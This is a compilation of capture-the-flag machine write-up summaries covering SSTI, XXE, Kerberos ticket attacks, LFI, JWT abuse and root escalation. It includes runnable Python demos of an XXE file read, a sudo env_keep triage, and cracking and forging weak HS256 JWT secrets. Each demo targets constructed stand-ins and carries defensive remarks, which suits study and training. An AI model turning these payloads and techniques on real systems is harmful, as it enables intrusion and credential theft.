Machine Name: Red Panda IP: 10.10.11.170 Difficulty: Easy
Summary
Red Panda is an easy machine (not really) that exploits SSTI in a Java Spring Boot application to obtain RCE. To escalate privileges to root, enumeration of directories, permissions, identities, groups, processes, and files needs to be chained together to exploit a file that is run as a cronjob by root. The main attack involves performing an XXE attack to gain access to the private key of root.
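The XXE step above hinges on a parser that is allowed to resolve external entities. The following added example (not code from the write-up, and not the box's Java application) shows the mechanism in Python's xml.sax, which exposes the relevant switch as a single feature flag: the same payload is fed to a parser with external general entities enabled and to one with them disabled. The target file, its contents and the element names are constructed stand-ins, and the file:// URL assumes a POSIX path.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collect the character data of the document; content pulled in by an
    expanded external entity is delivered here like any other text."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_untrusted(xml_bytes, resolve_external_entities):
    """Parse attacker-controlled XML. resolve_external_entities=True is the
    vulnerable configuration: SYSTEM entities are fetched and inlined."""
    parser = xml.sax.make_parser()
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks).strip()


def xxe_payload(target_path):
    """Classic file-read XXE: declare an external entity that points at a
    local file and reference it inside element content."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file://' + target_path + '"> ]>\n'
        "<data>&xxe;</data>"
    ).encode()


def demo():
    """Return (what the vulnerable parser leaks, what the hardened parser
    returns) for a constructed stand-in for a private key file."""
    with tempfile.NamedTemporaryFile("w", suffix=".key", delete=False) as f:
        f.write("-----BEGIN FAKE KEY-----\nnot-a-real-key\n-----END FAKE KEY-----\n")
        path = f.name  # constructed file, deleted again below
    try:
        leaked = parse_untrusted(xxe_payload(path), resolve_external_entities=True)
        safe = parse_untrusted(xxe_payload(path), resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

The hardened parser returns an empty string because the entity reference is skipped rather than resolved; in a Java DocumentBuilderFactory the equivalent control is disallowing DOCTYPE declarations and external entities before parsing anything user-supplied.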
Machine Name: Scrambled IP: 10.10.11.168 Difficulty: Medium
Summary
Scrambled is a medium machine that requires an understanding of how Kerberos works. It includes enumerating users through the error messages returned by Kerberos authentication and password spraying to obtain valid credentials for the users found. The obtained credentials are used to request a TGT, with which SPNs are enumerated and a TGS (service ticket) is obtained. The TGS was cracked and new credentials were obtained. These new credentials did not work when logging in with the MSSQL client. The TGT was used to enumerate the SMB share, where a PDF describing the imposed access controls was found: only administrator accounts can access the SQL database. A Silver Ticket attack was performed in order to gain access to the database, where more credentials were found and a shell could be obtained. After gaining the user shell, a DLL file that was found was decompiled and analysed. A deserialization call was identified and exploited by crafting a payload with ysoserial to gain an administrator shell.
Trick is a moderately easy machine that demands a lot of enumeration. It involves finding two sub-domains through a DNS zone transfer and sub-domain fuzzing. One of the sub-domains has a SQLi that can be leveraged to gather information on the server, and the other has an LFI that exposes an SSH private key. This key is used to gain SSH access as the user. Since the user can restart fail2ban as root, one of fail2ban’s configuration files needed to be modified to gain a reverse shell as root.
Machine Name: Catch IP: 10.10.11.150 Difficulty: Medium
Summary
Catch is a machine that requires reverse engineering an APK, enumerating the APK’s contents for information, and finding API tokens. Using the tokens, we log in to a dashboard that is vulnerable to injection, which leads to leaking SSH credentials. These credentials are used to get the user shell. Escalating privileges involves monitoring processes and finding a script that allows the user to inject payloads and execute them as root.
OpenSource, like its name, is all about exploiting information that is openly available. It demands knowledge of LFI, Docker, Flask, reading source code, and of course Git. To get the user shell, an LFI vulnerability was exploited to get RCE. The resulting shell lands inside a Docker container, which needed to be escaped to reach the host; knowledge of tunneling helps to connect to the host machine, enumerate further, and gain access as the user via leaked credentials. Escalating privileges requires understanding Git hooks to exploit a process running as root. This box is great for someone who is new to programming and learning code/version management tools like Git.
Machine Name: Meta IP: 10.10.11.140 Difficulty: Medium
Summary
Meta is a machine that involves finding a virtual host and then exploiting a vulnerability in the web application. Once exploited, it gives us a limited shell as www-data. To obtain user, we enumerate further into background processes and how they are being run. Exploiting another vulnerability in the application, we gain access to files that would otherwise be unreadable. With that sensitive information, we gain access to the user shell and proceed to escalate privileges through a sudo misconfiguration. It involves understanding how the sudo-allowed binary runs and how an environment variable that sudo lets through can be used to leverage the binary’s functionality to gain root privileges.
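The sudo step above only works when a variable survives sudo’s env_reset, which is exactly what the Defaults block of `sudo -l` tells you. The following added example (not code from the write-up) parses that output and pairs every preserved variable with every command that runs as root, which is the list an attacker (or an auditor) would then inspect by hand. The sample output, the user, host, binary and variable names in it are constructed and hypothetical, not taken from the box.

```python
import re


def parse_sudo_l(output):
    """Split `sudo -l` output into the env_keep variables from the Defaults
    block and the commands the user may run (run-as user, NOPASSWD flag)."""
    env_keep, commands, section = [], [], None
    for raw in output.splitlines():
        if raw.startswith("Matching Defaults"):
            section = "defaults"
            continue
        if re.match(r"User \S+ may run", raw):
            section = "commands"
            continue
        line = raw.strip()
        if not line:
            continue
        if section == "defaults":
            # env_keep+=VAR or env_keep+="VAR1 VAR2"; sudo prints a comma
            # separated list that may wrap onto several indented lines.
            for m in re.finditer(r'env_keep\+?=\s*"?([^",]+)"?', line):
                env_keep.extend(m.group(1).split())
        elif section == "commands":
            m = re.match(r"\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)", line)
            if m:
                for cmd in m.group("cmds").split(","):
                    commands.append({
                        "runas": m.group("runas").strip(),
                        "nopasswd": "NOPASSWD" in m.group("tags"),
                        "command": cmd.strip(),
                    })
    return env_keep, commands


def risky_pairs(output):
    """Preserved environment variables paired with every command that can run
    as root. Each pair is a candidate for the 'binary reads its config or
    plugins from $VAR' escalation and needs a manual look at the binary."""
    env_keep, commands = parse_sudo_l(output)
    return [
        (var, c["command"])
        for var in env_keep
        for c in commands
        if c["runas"].split(":")[0].strip() in ("root", "ALL")
    ]


# Constructed `sudo -l` output; user, host, binary and variable are hypothetical.
SAMPLE_SUDO_L = """Matching Defaults entries for alice on box:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
    env_keep+=TOOL_CONFIG_DIR

User alice may run the following commands on box:
    (root) NOPASSWD: /usr/bin/example-tool
"""

if __name__ == "__main__":
    for var, cmd in risky_pairs(SAMPLE_SUDO_L):
        print(f"check whether {cmd} honours ${var} when run under sudo")
```

The usual fix on the defence side is to drop the env_keep entry (or point the binary at a fixed, root-owned configuration path) rather than to trust the binary to ignore the variable.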
Machine Name: Noter IP: 10.10.11.140 Difficulty: Medium
Summary
Noter is a machine where basic enumeration leads to session cookies, JWT secrets, and credentials to servers. It teaches code review and the identification of code injection. Privilege escalation was fairly simple, as it was achieved with a public exploit that required credentials obtained during enumeration. The exploit allowed command execution as root through MySQL, giving a root shell.
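A leaked or guessable JWT secret matters because HS256 tokens can be verified, and therefore minted, offline by anyone who holds it. The following added example (not code from the write-up, and not the box’s application) shows the whole cycle with only the Python standard library: reading the claims without verification, recovering a weak secret by recomputing the MAC over a small wordlist, forging a token with elevated claims, and a server-side verify that pins the algorithm so an attacker cannot downgrade it. The secret, token, claims and wordlist are constructed here and are not taken from the box.

```python
import base64
import hashlib
import hmac
import json


def b64url_decode(segment):
    # JWT segments drop base64url padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def hs256(signing_input, secret):
    return hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()


def decode_unverified(token):
    """Read header and claims without checking the signature: this is what
    enumeration sees, and it must never be trusted for authorization."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def recover_secret(token, wordlist):
    """Offline guess of an HS256 secret: recompute the MAC with each candidate
    and compare it against the signature carried in the token."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    signature = b64url_decode(sig_b64)
    for candidate in wordlist:
        if hmac.compare_digest(hs256(signing_input, candidate), signature):
            return candidate
    return None


def forge(claims, secret):
    """Mint a token with arbitrary claims once the secret is known."""
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload_b64 = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig_b64 = b64url_encode(hs256(f"{header_b64}.{payload_b64}".encode(), secret))
    return f"{header_b64}.{payload_b64}.{sig_b64}"


def verify(token, secret):
    """Server-side check. The algorithm is pinned by the server, not read from
    the token, so 'alg: none' and algorithm-confusion tokens are rejected."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:  # malformed structure, base64 or JSON
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hs256(f"{header_b64}.{payload_b64}".encode(), secret)
    if not hmac.compare_digest(expected, signature):
        return None
    return json.loads(b64url_decode(payload_b64))


# Constructed stand-ins: a weak secret, a token as an app might issue it,
# and a small wordlist. None of these come from the box.
WEAK_SECRET = "secret123"
CAPTURED_TOKEN = forge({"user": "guest", "admin": False}, WEAK_SECRET)
WORDLIST = ["password", "admin", "secret", "secret123", "changeme"]

if __name__ == "__main__":
    print("claims (unverified):", decode_unverified(CAPTURED_TOKEN)[1])
    found = recover_secret(CAPTURED_TOKEN, WORDLIST)
    print("recovered secret:", found)
    print("forged admin token:", forge({"user": "admin", "admin": True}, found))
```

Pinning the algorithm in `verify` is the part most real-world libraries get wrong by default; a verifier that honours the token’s own `alg` header accepts an unsigned `alg: none` token with the same claims.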
Machine Name: Late IP: 10.10.11.156 Difficulty: Easy
Summary
Late has an interesting way of exploiting Server Side Template Injection (SSTI): the payload is delivered through the application’s image-to-text conversion. Once an image payload that the application recognises correctly is executed, we obtain a user-level shell. To escalate privileges, simple enumeration leads to an interesting file run by root. With some understanding of file attributes, it is easy enough to run code as root and gain root privileges.
Machine Name: Paper IP: 10.10.11.143 Difficulty: Easy
Summary
Paper is a relatively easy box that teaches enumeration and a bit of reading API documentation. It forces the attacker to keep looking for sensitive information that can be used to run commands and eventually get a shell. To get a user shell, we find credentials on the system through a chat bot; they can be used to log in over SSH. Another way was to find a command hidden from the ones listed by the bot, by reading the API documentation or finding a scripts directory, to run commands as the user and get a shell. Escalating privileges to root was simple, as the box was vulnerable to a popular vulnerability with a simple PoC.
An APK file is to be inspected to understand a feature’s inner workings. To get the user shell, the traffic was redirected to Burp and an RCE vulnerability through injection is to be exploited. To escalate privileges, simple enumeration leads us to an exploit PoC that gives a root shell.